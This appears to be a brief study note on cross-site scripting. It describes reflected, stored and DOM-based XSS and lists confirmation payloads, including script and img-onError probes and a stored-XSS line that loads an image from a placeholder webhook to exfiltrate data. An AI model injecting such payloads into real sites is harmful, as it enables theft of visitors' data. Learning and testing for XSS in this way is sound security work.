XSS

There are three different types of cross-site scripting

• Reflected

• Stored

• DOM-based

There are many options to confirm XSS:

// Embed a script tag
<script>prompt(1);</script>

// Use an error state of an image
<img src="x" onError="prompt(1);" />

// Test HTML injection to be a but more subtle
<h1>testing</h1>

// For a stored XSS, we can use javascript to create an image
<script>var i = new Image;i.src="[webhook/webserver]?[info to exfiltrate]";</script>

Reflected

The script you are trying to inject comes from the current request. Somewhat limiting

Stored

Payload is stored in something like a databased, impact is much higher

DOM-Based

Client side has vulnerable JS that uses untrusted input instead of having a vuln server-side

This can be seen when you're able to see input data populated on the site, but there are no network requests, meaning this data is loaded specifically in the DOM.